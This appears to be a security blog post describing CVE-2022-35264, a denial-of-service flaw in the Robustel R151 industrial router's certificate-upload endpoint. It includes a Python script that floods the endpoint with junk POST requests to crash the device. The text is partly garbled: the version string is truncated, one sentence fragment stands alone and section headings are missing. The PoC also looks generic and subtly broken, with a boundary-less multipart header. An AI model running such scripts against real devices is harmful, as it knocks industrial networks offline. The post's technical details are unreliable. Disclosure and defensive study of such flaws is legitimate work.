CVE-2022-35264 - Denial of Service in Robustel R151's `/action/import_aaa_cert_file/` Endpoint Explained

A serious Denial of Service (DoS) vulnerability has been found in the Robustel R151 industrial router, impacting firmware versions 3.1.16 and 3.3.. This issue, identified as CVE-2022-35264, affects the web server’s hashFirst functionality, specifically through the /action/import_aaa_cert_file/ API route. In simple terms, a remote attacker can crash the device— interrupting internet connectivity—by sending a specially-crafted HTTP request to the router.

This post will break down what the vulnerability is, how it works, and provide example code to help you understand the risk. We’ll also share original references and advice on protecting your devices.

What Is the Vulnerability?

Robustel R151 routers are widely used in industries for remote connectivity. The /action/import_aaa_cert_file/ endpoint lets users upload authentication certificates. But due to poor input handling in the firmware’s hashFirst process, an attacker can send crafted data that overwhelms the router and causes it to crash or become unresponsive.

Denial of Service (DoS):  
After receiving multiple malicious requests, the device's web server crashes. This forces a reboot or a manual reset, resulting in downtime and disconnection from the network.

Vulnerable Firmware: 3.1.16 and 3.3.

- Vulnerable API: /action/import_aaa_cert_file/

Type: Denial of Service via hashFirst in the web server

The problem is tied to how the web server processes file uploads on the endpoint. The hashFirst functionality fails to validate input correctly. When attacked, the server cannot handle the malformed requests and stops responding.

Proof-of-Concept (PoC) Exploit

WARNING:  
This is for educational purposes only! Do not attack any device you don't own or have permission to test.

Here’s a simple Python code snippet to demonstrate the issue. This script will repeatedly POST junk data to the vulnerable endpoint.

import requests

target = 'http://<ROUTER-IP>';
endpoint = '/action/import_aaa_cert_file/'
url = target + endpoint

# Large junk payload to stress the server.
data = {
    'imported_file': ('dos_attack.cert', b'A' * 4096)
}

headers = {
    'Content-Type': 'multipart/form-data'
}

for i in range(100):
    print(f"Sending request {i+1}")
    try:
        requests.post(url, files=data, timeout=2)
    except Exception as e:
        print(f"Request failed: {e}")
        break

print("Attack finished. Check if device is responsive.")

This script sends 100 requests in a loop. If the router is unpatched, its web interface will likely become unresponsive after fewer than 100 attempts.

Require a physical power cycle to recover, causing operational downtime.

Industries affected: Any user of R151 routers, especially in manufacturing, transport, utilities, and other sectors relying on remote or industrial internet access.

National Vulnerability Database:

https://nvd.nist.gov/vuln/detail/CVE-2022-35264

Original Advisory (Packet Storm):

https://packetstormsecurity.com/files/168376/Robustel-R151-3.1.16-3.3.-Denial-Of-Service.html
- Firmware Download/Support:  
 https://www.robustel.com/en/support/firmwares/

Disable Unneeded APIs:

If possible, restrict access to the /action/import_aaa_cert_file/ endpoint.

Conclusion

*CVE-2022-35264* is a real danger to networks running Robustel R151 routers. The flaw in the /action/import_aaa_cert_file/ functionality allows even non-technical attackers to easily knock devices offline. Fixes and mitigations are available, so it’s critical to patch your devices and restrict unknown network access as soon as possible.

Stay safe and keep your infrastructure up to date!

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 04/26/2023 19:16:00 UTC